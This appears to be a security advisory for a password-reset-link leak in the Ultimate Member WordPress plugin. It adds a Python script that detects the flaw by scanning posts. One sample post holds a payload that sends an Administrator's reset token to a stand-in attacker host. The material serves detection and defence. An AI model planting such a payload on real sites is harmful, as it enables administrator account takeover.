Impact
The Ultimate Member plugin’s ‘{usermeta:password_reset_link}’ tag can be abused inside the [um_loggedin] shortcode. The tag resolves to a password reset link for the user who is viewing the content, not for the author who inserted it. A logged‑in user with Contributor rights can therefore plant the tag in a pending post; when an Administrator previews that post, the plugin generates a valid password reset token for the Administrator and the rendered content delivers that token to an attacker‑controlled server. The attacker then uses the token to reset the Administrator’s password and take full control of the site. The root cause is missing authorization over who may obtain a reset link for another, privileged account, classified as CWE‑285 (Improper Authorization); the result is loss of confidentiality and integrity for privileged accounts.
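A practitioner triaging this on a live site wants to know whether the tag has already been planted. The following Python script is an added example, not code from the plugin or from this advisory: it scans exported wp_posts rows for the ‘{usermeta:password_reset_link}’ tag, notes whether it sits inside an [um_loggedin] shortcode and whether an off‑site URL appears alongside it, and ranks the findings. The post rows, author IDs and hostnames are constructed for the example; the payload shape in the sample is hypothetical, since the page does not show the real one.

```python
"""Hunt for the Ultimate Member password-reset-link leak pattern in WordPress post content.

Added example, not the plugin's or the advisory's code. On a real site, feed it rows
exported from wp_posts, for example with WP-CLI:
    wp db query "SELECT ID, post_author, post_status, post_content FROM wp_posts
                 WHERE post_content LIKE '%password_reset_link%'"
Here the rows are constructed inline so the script runs offline.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Body of the [um_loggedin] shortcode, the context the advisory names.
UM_LOGGEDIN_RE = re.compile(r"\[um_loggedin\b[^\]]*\](.*?)\[/um_loggedin\]",
                            re.IGNORECASE | re.DOTALL)
# The merge tag that expands to the reset link of whoever is *viewing* the post.
RESET_TAG_RE = re.compile(r"\{usermeta:password_reset_link\}", re.IGNORECASE)
# Hosts of absolute URLs in the content; an off-site host next to the tag is suspect.
URL_HOST_RE = re.compile(r"https?://([^/\s\"'<>]+)", re.IGNORECASE)


@dataclass
class Finding:
    post_id: int
    author_id: int
    status: str
    inside_um_loggedin: bool
    external_hosts: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Tag inside [um_loggedin] plus an off-site URL is the shape the advisory describes.
        if self.inside_um_loggedin and self.external_hosts:
            return "high"
        return "review"


def scan_post(post: dict, site_host: str) -> Optional[Finding]:
    """Return a Finding if the post carries the reset-link tag, else None."""
    content = post["post_content"]
    if not RESET_TAG_RE.search(content):
        return None
    inside = any(RESET_TAG_RE.search(m.group(1))
                 for m in UM_LOGGEDIN_RE.finditer(content))
    hosts = sorted({h.lower() for h in URL_HOST_RE.findall(content)
                    if h.lower() != site_host.lower()})
    return Finding(post["ID"], post["post_author"], post["post_status"], inside, hosts)


def scan_posts(posts: List[dict], site_host: str) -> List[Finding]:
    """Scan every row and keep only the posts that contain the tag."""
    return [f for f in (scan_post(p, site_host) for p in posts) if f is not None]


# Constructed sample rows (hypothetical IDs, authors and hosts), not data from any real site.
SAMPLE_POSTS = [
    {"ID": 101, "post_author": 7, "post_status": "pending",
     "post_content": "A harmless draft about container hardening."},
    {"ID": 102, "post_author": 7, "post_status": "pending",
     "post_content": "[um_loggedin]Thanks for reviewing! "
                     "https://attacker.example/c?l={usermeta:password_reset_link}[/um_loggedin]"},
    {"ID": 103, "post_author": 1, "post_status": "publish",
     "post_content": "Lost your password? {usermeta:password_reset_link} "
                     "See https://victim.example/help"},
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS, "victim.example"):
        print(f"post {f.post_id} author {f.author_id} {f.status}: {f.severity} "
              f"(in um_loggedin={f.inside_um_loggedin}, external={f.external_hosts})")
```

Post 102 is the high‑priority hit: a pending post by a non‑admin author with the tag inside [um_loggedin] next to an off‑site host. Post 103 still surfaces for review, because the tag resolves for the viewer wherever it is rendered; the [um_loggedin] wrapper only marks the case the advisory describes.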
Affected Systems
All WordPress sites running the Ultimate Member plugin (Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin) up to version 2.11.2. Any site where lower‑privileged users can submit pending posts and higher‑privileged users preview them is exposed. No software beyond WordPress and the plugin itself is listed as a prerequisite, so any environment running this plugin is vulnerable.
Risk and Exploitability
The CVSS score of 8.0 places this vulnerability in the high severity range. EPSS data is unavailable and the vulnerability is not yet listed in CISA’s KEV catalog, but the exploit path is straightforward: an authenticated user with Contributor rights or higher creates or edits a pending post containing the dangerous tag, and an Administrator previews it. The only obstacle is that user interaction, and previewing pending submissions is routine editorial work. Because Contributor is a low‑privilege role, any site that accepts content from registered users is exposed, and exfiltration of a reset token leads directly to account takeover. Given the low technical barrier, the risk to sites that have not patched this plugin is significant.
OpenCVE Enrichment